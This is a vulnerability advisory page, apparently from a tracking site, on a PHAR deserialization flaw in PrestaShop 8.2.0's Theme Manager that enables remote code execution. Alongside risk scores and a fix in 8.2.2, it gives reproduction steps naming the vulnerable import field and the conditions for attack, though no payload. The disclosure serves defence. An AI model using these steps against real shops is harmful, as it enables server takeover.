Primary

Context

PrestaShop PHAR Deserialization Vulnerability Allowing Arbitrary Code Execution

Vulnerability

A PHAR deserialization vulnerability has been identified in PrestaShop version 8.2.0, specifically within the Theme Manager component. This vulnerability allows attackers to execute arbitrary code by sending a crafted POST request that includes a malicious PHAR file. The issue arises because the application deserializes user input without proper validation, enabling the execution of unauthorized PHP code on the server.

Impact

Exploitation of this vulnerability leads to unauthorized remote code execution on the server where PrestaShop is installed.

Reproduction

To reproduce this vulnerability, upload a malicious PHAR file through the 'import_theme[import_from_web]' field in a POST request to the themes import administration page. Ensure that the request includes a valid token and is sent to a PrestaShop 8.2.0 installation running PHP 7.x.

Remediation

Users are advised to update to PrestaShop version 8.2.2 or later, where this vulnerability has been fixed.

Added: Jul 30, 2025, 5:26 PM

Updated: Jul 30, 2025, 7:40 PM

Vulnerability Rating

Custom Algorithm

spread

6.4

impact

10.0

exploitability

6.8

remediation

0.0

relevance

0.3

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

6.4

impact

10.0

exploitability

6.8

remediation

0.0

relevance

0.3

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

PrestaShop PHAR Deserialization Vulnerability Allowing Arbitrary Code Execution

Vulnerability

Impact

Reproduction

Remediation

Affected Products

PrestaShop

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating